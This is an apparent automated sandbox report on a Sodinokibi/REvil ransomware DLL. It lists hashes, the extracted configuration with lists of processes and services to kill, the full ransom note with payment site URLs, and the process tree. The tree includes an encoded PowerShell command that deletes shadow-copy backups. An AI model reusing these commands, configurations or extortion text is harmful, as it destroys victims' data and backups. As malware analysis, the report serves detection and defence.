Analysis

  • max time kernel
    147s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/02/2025, 20:00

General

  • Target

    1afb4979e4e6ff85fac9509f13d002adfce88da1a8cc716201996b616d8e9561.dll

  • Size

    274KB

  • MD5

    f6e66fd7f84923e880ae8b9ff186c82a

  • SHA1

    f553513fde4fb0a3c4c1ead2437e74a5ebe3c1f5

  • SHA256

    1afb4979e4e6ff85fac9509f13d002adfce88da1a8cc716201996b616d8e9561

  • SHA512

    ddad53423b4cf6ab3b1c5b5e9b275d89bd56a284e2ebafab8cd1c4b0e1c15ec8b77cf136f368cd6089958d7f1cc88f08e59ff7daf63e7238fb9de3450e7898c9

  • SSDEEP

    6144:ow9vteqJggn7oUfFcLWeGbfUTpYDDmu/+3fbc:oitgi7oUfavG+pG/Yc

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$rsIIyY2dx6y5j3gb1T189ee0VFXB.0ImN/bN2vbUcjxBTG7Q6ZNTy

Campaign

3810

Decoy

ki-lowroermond.nl

facettenreich27.de

tips.technology

sporthamper.com

ontrailsandboulevards.com

kidbucketlist.com.au

vesinhnha.com.vn

you-bysia.com.au

zimmerei-fl.de

blacksirius.de

sportsmassoren.com

lorenacarnero.com

citymax-cr.com

braffinjurylawfirm.com

caribbeansunpoker.com

atmos-show.com

webmaster-peloton.com

liveottelut.com

tanzschule-kieber.de

nancy-informatique.fr

Attributes
  • net

    false

  • pid

    $2a$10$rsIIyY2dx6y5j3gb1T189ee0VFXB.0ImN/bN2vbUcjxBTG7Q6ZNTy

  • prc

    powerpnt

    synctime

    wordpad

    firefox

    encsvc

    msaccess

    agntsvc

    xfssvccon

    ocssd

    mydesktopqos

    oracle

    visio

    sqbcoreservice

    winword

    infopath

    ocautoupds

    dbeng50

    thebat

    isqlplussvc

    dbsnmp

    thunderbird

    tbirdconfig

    mydesktopservice

    ocomm

    sql

    outlook

    excel

    onenote

    steam

    mspub

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    3810

  • svc

    sophos

    backup

    sql

    veeam

    memtas

    svc$

    vss

    mepocs

Extracted

Path

C:\Users\2us7rm2k-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 2us7rm2k. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B071C623D7E64A42 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/B071C623D7E64A42 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: z/RCAd+MbH4SmWysj6/fSb9XU3+gy9JddpEcqvjpOE17R6MiRWKgCTMig6Ii1uCc XbmhmapdaJDnOgyvcKHhitjgTPVgSBnJnjlgPwY4fh62QD3+vbwObRvcsDAeoNFK ZgoMIoXqSrsfrqb525mo3eeoeKjioi9n4rvYTM4fxvKrjy42gTWAAiu86uH8v3nE ZawuqoN7YJQd1ujfh40HTQhzDVlEUqHEvfMKeV5UxhhGVRn8eVmG1VWzODDJHcP/ w2x9PqszBiz75P8ORcAlg6u+Ny+WXL/B057Jt1J0Rl/qPrsFfUk8Odtb38HMMvLA vcmNjlT1mIbjXM9T9rtkgcoa4c8wXfBa4eRu/U+i6o0J7c9DVipA1NZniqSrBQMc 06UpwrIaWAwXVFwaeNf12xSgvMYAsQKtZO6cAZ6kPsA/1CDfKzamMsDaDgkN4d2h UDMEZCdbKn3qzClEwWeVRwW+hWSQWTn6GYH/QYjQ757txaiI8f1Vgwv5p3vRjh/F +kJXrMVCBGsThflyOw/LEcWsAVmh97gfDt6HN2qj1ujyQsb8Nau+IkvPVYRTqsQN aSmyLdmWw8gNEeUpl3/1UogN09ObRdsHtZwaF2deXU0csNnBMAc8BgrOcJqt7l1F maM8WDJNk/XcrVGCdVrPARWKlMxjVCwbPmqHpwd57vAoOgRoXtne/oCA72YWXPWk 6vg+4KkO2d750eiAr9BsouKw9Ez5pjcGqncFHAqRSPGNl7MZlEbAA8+yeI6VsTi0 2xCgAC3RCHF2W6wccyRwLup6eJ2WGGnjTogIcn9w2OmfiDZzEJiflvzBidkdMvJ6 p6BYGXcflLZ8w9/mylD3Ly0Ch7Ng2uLvUzZlmmLrqyKNHF3P470kuawI9u3H6xWs 990x4AJCVpmApbC0gIbV0EbtN65g3eXfcBUqihJlbgvNWOjNwNFSGM6GULvi3JHI OYNMV9IxCjU7bxldh4JE2yEuV2ezjJPn2mbP2OnYzAHWM753fwgOyFJCMlNptpNF TvsdfLyuYJwGUTIPsZXsjg9KjAlbR5zpZFZPRGGheABk7vMpf5hjz9C/q1TV4Xnf 7Z5l23lvEs1pvqtLQ385osiwaLeFEU4creW1ORk6xt13j39NOjNvZw2iAFo2JYcA UI+p7H/ZOdevxIHduuWL09T/4zHQ9fqdXyIgS1G0/Xck7SH8pFNUhkAsT2p0oCi2 TE53ViYz9A9kccFVeHz/jEra2jfSio6D+Xa0icJgNbQolZ6vdgs3o2QPvG5xmc7s 6YmRjkLVqh5GLGKZE6LWzg86ID4xNNCLCeGbUR9XMxyqqKFZsribDCHjgZWzzLLM KX4/vbGph9wo9z8gr6IObDN+Pi6Of0GZvY/i7hljt2yBfV8SS9GsEcDM ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B071C623D7E64A42

http://decryptor.cc/B071C623D7E64A42

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Sodinokibi family
  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 31 IoCs
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\1afb4979e4e6ff85fac9509f13d002adfce88da1a8cc716201996b616d8e9561.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2712
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\1afb4979e4e6ff85fac9509f13d002adfce88da1a8cc716201996b616d8e9561.dll,#1
      2⤵
      • Enumerates connected drives
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3520
      • C:\Windows\SysWOW64\rundll32mgr.exe
        C:\Windows\SysWOW64\rundll32mgr.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2888
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 268
          4⤵
          • Program crash
          PID:5012
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4900
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2888 -ip 2888
    1⤵
      PID:3508
    • C:\Windows\system32\wbem\unsecapp.exe
      C:\Windows\system32\wbem\unsecapp.exe -Embedding
      1⤵
        PID:4208
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3076

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\2us7rm2k-readme.txt

        Filesize

        6KB

        MD5

        0039b483b49695c4f417c56088fb42ab

        SHA1

        fe47b72c75e0d8d92fdd65cebc9973f748a5e781

        SHA256

        4239ebee2f1c461be021ecb342a838f57d5c3d7040f2591a37b2239569a3df9f

        SHA512

        2f1617c18eee91a55bc336569469f9a76d6dc3105dbc948b5b8a31fcdfe5970d28d638cbccb0ff290cd1ed76efef411fda946e000d601eaf38bedfecb7f749b8

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e5v2riwn.im5.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Windows\SysWOW64\rundll32mgr.exe

        Filesize

        105KB

        MD5

        d5ca6e1f080abc64bbb11e098acbeabb

        SHA1

        1849634bf5a65e1baddddd4452c99dfa003e2647

        SHA256

        30193b5ccf8a1834eac3502ef165350ab74b107451145f3d2937fdf24b9eceae

        SHA512

        aa57ce51de38af6212d7339c4baac543a54b0f527621b0ef9e78eca5e5699e8508a154f54f8ac04135527d8417275eeee72a502a362547575699330cc756b161

      • memory/2888-4-0x0000000000400000-0x000000000045D000-memory.dmp

        Filesize

        372KB

      • memory/2888-6-0x0000000000490000-0x0000000000491000-memory.dmp

        Filesize

        4KB

      • memory/2888-8-0x0000000000400000-0x000000000045D000-memory.dmp

        Filesize

        372KB

      • memory/3520-1-0x00000000751C0000-0x0000000075208000-memory.dmp

        Filesize

        288KB

      • memory/4900-9-0x00007FFF24473000-0x00007FFF24475000-memory.dmp

        Filesize

        8KB

      • memory/4900-19-0x000001C79DBF0000-0x000001C79DC12000-memory.dmp

        Filesize

        136KB

      • memory/4900-20-0x00007FFF24470000-0x00007FFF24F31000-memory.dmp

        Filesize

        10.8MB

      • memory/4900-21-0x00007FFF24470000-0x00007FFF24F31000-memory.dmp

        Filesize

        10.8MB

      • memory/4900-24-0x00007FFF24470000-0x00007FFF24F31000-memory.dmp

        Filesize

        10.8MB